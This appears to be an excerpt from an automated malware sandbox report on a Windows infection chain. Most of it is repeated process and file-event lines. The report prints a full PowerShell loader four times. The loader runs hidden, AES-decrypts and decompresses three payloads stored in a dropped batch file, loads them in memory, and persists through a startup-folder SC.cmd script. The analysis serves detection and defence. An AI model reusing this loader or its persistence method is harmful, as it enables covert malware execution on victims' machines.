    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    VBScript performs obfuscated calls to suspicious functions
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c C:\Users\user\AppData\Roaming\dropped.bat", "0", "false");
    Suspicious command line found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Suspicious powershell command line found
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00404C9D LoadLibraryA,GetProcAddress,17_2_00404C9D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmdJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmdJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
